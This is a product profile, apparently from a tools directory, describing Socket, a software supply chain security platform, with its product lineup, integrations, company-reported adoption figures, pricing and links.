# Socket

> Socket blocks malicious open source packages before they reach your code by proactively analyzing dependency behavior across all major registries.

Socket is a software supply chain security platform founded in 2021 by Feross Aboukhadijeh, a prolific open source maintainer whose projects see over a billion downloads monthly. The platform proactively detects and blocks malicious packages in real time, integrating directly into developer workflows rather than relying on reactive CVE databases. Socket is SOC 2 Type II certified and has raised $125M, according to the company's own announcements.

## What It Is

Socket is a developer-first supply chain security tool that scans every open source package and update for malicious behavior across all major registries — npm, PyPI, RubyGems, and more. Instead of waiting for a CVE to be published, Socket analyzes the actual behavior of dependencies: what network calls they make, what files they access, whether they contain install scripts, and whether they exhibit signs of typosquatting or known malware patterns. The platform surfaces these signals as actionable alerts directly in pull requests, the CLI, and the IDE, so developers can catch threats before they merge.

## Core Product Surface

Socket ships as a suite of integrated tools that work together across the development lifecycle:

- **Socket for GitHub** — a GitHub App that comments on PRs with risk alerts for new or updated dependencies, with configurable block/warn policies
- **Socket Firewall** — a CLI-level proxy (`sfw`) that intercepts package installs and blocks malicious packages at install time, supporting self-hosted or client/server deployment
- **Socket CLI** — command-line scanning for local and CI environments
- **Socket Reachability** — precomputed reachability analysis that, according to Socket, cuts 60% of CVE false positives automatically; the Enterprise tier adds full application function-level reachability claimed to eliminate up to 90% of irrelevant CVEs
- **Socket Certified Patches** — human-reviewed, one-click patches for CVEs, including combined multi-CVE patches and automatic patch PRs
- **Socket Web Extension** — browser extension for reviewing package security on registry pages
- **Socket Dependency Search** — security scoring for millions of open source packages across registries
- **Socket ExtensionGuard** — scanning for browser and IDE extensions

## Integrations and Platform Coverage

Socket integrates across the modern development stack. Source control integrations include GitHub on all paid tiers, with GitLab, Bitbucket, Azure DevOps, and self-hosted SCM available on Enterprise. Package manager support spans 10+ languages including JavaScript/TypeScript, Python, Go, and Ruby. Ticketing and messaging integrations include Slack alerts for new malware or vulnerabilities. SIEM integrations are available on paid tiers. The platform also supports SBOM import/export, SSO/SAML, SCIM provisioning, webhook automation, compliance integrations (e.g., Vanta), MCP server, and AI code agent integrations.

## Adoption and Recognition

According to Socket's own published metrics, the platform protects over 1.5 million code repositories, secures more than 11.6 million commits per month, and blocks over 10,000 attacks per week across more than 27,000 organizations. Socket publishes case studies naming Anthropic, Vercel, MetaMask, Drata, and Replit as customers. The company states it has been recognized on the Fortune Cyber 60 list and is part of OpenAI's Trusted Access for Cyber program alongside Semgrep, Calif, and Trail of Bits.

## Update: Launch Week — Repository Access Permissions and Custom Roles

Socket's most recent announced feature, highlighted at the top of the site during a "Launch Week," is the introduction of Repository Access Permissions and Custom Roles. This expands the platform's access control capabilities, allowing organizations to define granular permissions at the repository level and assign custom roles to team members — a feature particularly relevant for larger enterprise deployments managing many repositories and contributors.

## Why It Stands Out

Traditional SCA tools are reactive: they alert on known CVEs after the fact. Socket's approach is behavioral — it detects zero-day supply chain attacks by analyzing what a package actually does, not just what version it is. The company was founded by open source maintainers who built the JavaScript ecosystem tooling that Socket now helps secure, giving the team direct insight into how supply chain attacks are constructed and how developers actually work.

## Features
- Malicious package detection across all major registries
- Socket for GitHub PR integration with block/warn policies
- Socket Firewall — blocks malicious packages at install time
- Socket Reachability — cuts CVE false positives by filtering unreachable code
- Full application function-level reachability (Enterprise)
- Socket Certified Patches — human-reviewed one-click CVE patches
- Automatic patch PRs
- Socket CLI for local and CI scanning
- Socket Web Extension for registry browsing
- Socket Dependency Search with security scoring
- Socket ExtensionGuard — scans browser and IDE extensions
- SBOM import/export
- SSO/SAML and SCIM provisioning
- Webhook automation
- Compliance integrations (e.g., Vanta)
- SIEM integrations
- Slack alerts for new malware or vulnerabilities
- AI analysis flagging hidden dependency behavior
- Scan GitHub Actions and AI models
- MCP server integration
- AI code agent integrations
- Monorepo support
- Custom security and license policies per repository label
- Audit logs and historical analytics
- SOC 2 Type II compliance

## Integrations
GitHub, GitLab, Bitbucket, Azure DevOps, npm, PyPI, RubyGems, Go modules, Slack, Jira, Vanta, SIEM platforms, Stripe (payments), MCP server, AI code agents, IDE plugins (VS Code, JetBrains), GCP Marketplace

## Platforms
WEB, CLI, API, BROWSER_EXTENSION, VSC_EXTENSION, JETBRAINS_PLUGIN

## Pricing
Freemium — Free tier available with paid upgrades

## Links
- Website: https://socket.dev
- Documentation: https://docs.socket.dev/
- Repository: https://github.com/SocketDev
- EveryDev.ai: https://www.everydev.ai/tools/socket-dev
